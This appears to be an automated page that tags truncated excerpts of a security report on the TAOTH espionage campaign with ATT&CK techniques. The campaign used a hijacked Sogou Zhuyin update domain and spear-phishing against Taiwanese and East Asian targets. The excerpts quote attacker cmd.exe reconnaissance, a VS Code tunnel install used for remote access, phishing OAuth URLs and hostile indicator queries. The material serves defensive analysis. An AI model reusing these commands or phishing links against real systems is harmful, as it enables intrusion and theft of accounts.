“type z.txt c:\windows\system32\cmd.exe /c code.exe tunnel service install c:\windows\system32\hostname.exe Operation 2: Spear-phishing Upon further investigation into the Sogou Zhuyin operation, we identified that one instance of the TOSHIS malware was distr…”
T1566.002 Spearphishing Link (89%)
“mail.send&redirect_uri=https%3a%2f%2fauth.onedrive365-jp.com%2fgetauthtoken&response_type=code&client_id=e707daa3-579f-4bae-bb7d-89a73d52ffa1 As indicated by the URLs, the OAuth applications request scopes for email manipulation, such as gma…”
T1525 Implant Internal Image (71%)
“o/oauth2/auth?response_type=code&client_id=715259374054-mst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com&redirect_uri=https%3a%2f%2fwww.auth-web.com%2fgm-oauth2-callback&scope=https%3a%2f%2fwww.googleapis.com%2fau…”
T1566.001 Spearphishing Attachment (71%)
“chain for the infection routine, the attacker first sends spear-phishing emails to targeted victims. These emails include either a phishing URL or a decoy document designed to entice the recipient to respond or interact with the malicious content. The attacker’s aim is to ach…”
T1041 Exfiltration Over C2 Channel (66%)
“information collector. It gathers filenames from the following locations: - Desktop - Program Files Once the filenames are collected, DESFY transmits this data to the C&C server via the HTTP POST method. This functionality is likely used for profiling victims to determine suit…”
T1574 Hijack Execution Flow (64%)
“victims and identify high-value targets. Victimology Since Sogou Zhuyin targets users who understand Zhuyin, most of the victims are based in Taiwan. However, the impact extends beyond the region — Taiwanese communities overseas have also been affected, resulting in a globally d…”
T1105 Ingress Tool Transfer (63%)
“Sogou Zhuyin in March 2025 and added the formerly legitimate but now-malicious domain dl[.]sogouzhuyin[.]com on it. Our analysis confirms that the downloaded installer is the official, unmodified version. However, a few hours after installation, the automatic update proce…”
T1059.003 Windows Command Shell (60%)
“…appdata% c:\windows\system32\cmd.exe /c dir %localappdata%\microsoft c:\windows\system32\cmd.exe /c dir %localappdata%\microsoft\office c:\windows\system32\cmd.exe /c curl -kOJL "https://code.visualstudio.com/sha/download?build…”
T1195.002 Compromise Software Supply Chain (55%)
“Sogou Zhuyin in March 2025 and added the formerly legitimate but now-malicious domain dl[.]sogouzhuyin[.]com on it. Our analysis confirms that the downloaded installer is the official, unmodified version. However, a few hours after installation, the automatic update proce…”
T1204.002 Malicious File (49%)
“chain for the infection routine, the attacker first sends spear-phishing emails to targeted victims. These emails include either a phishing URL or a decoy document designed to entice the recipient to respond or interact with the malicious content. The attacker’s aim is to ach…”
T1204.002 Malicious File (49%)
“TAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents APT & Targeted Attacks TAOTH Campaign Exploits End-of-Support Software to Target Traditional Chinese Users and Dissidents The TAOTH campaign exploited abandoned software and…”
T1528 Steal Application Access Token (48%)
“o/oauth2/auth?response_type=code&client_id=715259374054-mst41mfku1h8l7ga5vbtrv8cm48h9nde.apps.googleusercontent.com&redirect_uri=https%3a%2f%2fwww.auth-web.com%2fgm-oauth2-callback&scope=https%3a%2f%2fwww.googleapis.com%2fau…”
T1204.002 Malicious File (43%)
“victims and identify high-value targets. Victimology Since Sogou Zhuyin targets users who understand Zhuyin, most of the victims are based in Taiwan. However, the impact extends beyond the region — Taiwanese communities overseas have also been affected, resulting in a globally d…”
T1071.001 Web Protocols (41%)
“that the TAOTH campaign, along with the threat activities from Case 1 and 4 documented in ITOCHU’s research, can be attributed to the same threat actor group as supported by the following evidence: - Shared C&C infrastructures: analysis identified overlapping C&C infrastr…”
T1195.002 Compromise Software Supply Chain (41%)
“several hundred victims were affected, with infections leading to additional post-exploitation activities. Through infrastructure tracking, we observed that the same threat actor is also targeting high-value individuals primarily located in Eastern Asia. In this article, in a…”
T1071 Application Layer Protocol (35%)
“several hundred victims were affected, with infections leading to additional post-exploitation activities. Through infrastructure tracking, we observed that the same threat actor is also targeting high-value individuals primarily located in Eastern Asia. In this article, in a…”
T1195.002 Compromise Software Supply Chain (35%)
“…FY, and TOSHIS. Infection Chain According to an archived version of its Wikipedia page, the Sogou Zhuyin service was terminated and discontinued in June 2019. However, starting in October 2024, the attacker hijacked the abandoned official update domain (sogouzhuyin[.]com) …”
T1574.001 DLL (33%)
“several instances of modified binaries associated with this threat, including: - sunlogindesktopagent.exe - searchindexer.exe - procmon.exe The shellcode injected at the entry point uses Adler-32 to resolve API hashes. Subsequently, it maps the C&C data onto the stack, as…”
T1071.001 Web Protocols (32%)
“or objectHostName:"auth.onedrive365-jp.com") Network – IP eventId:3 AND (src:"45.32.117.177" OR src:"64.176.50.181" OR src:"154.90.62.210" OR src:"38.60.203.134" OR src:"192.124.176.51" OR dst:"45.32.117.177" OR dst:"64.17…”
T1572 Protocol Tunneling (32%)
“commands: Table 1. The commands in C6DOOR Post-exploitation routines It appears that the attacker was still in the reconnaissance phase, primarily seeking high-value targets. As a result, no further post-exploitation activities were observed in the majority of victim syste…”
Summary
The TAOTH campaign exploited abandoned software and spear-phishing to deploy multiple malware families, targeting dissidents and other high-value individuals across Eastern Asia.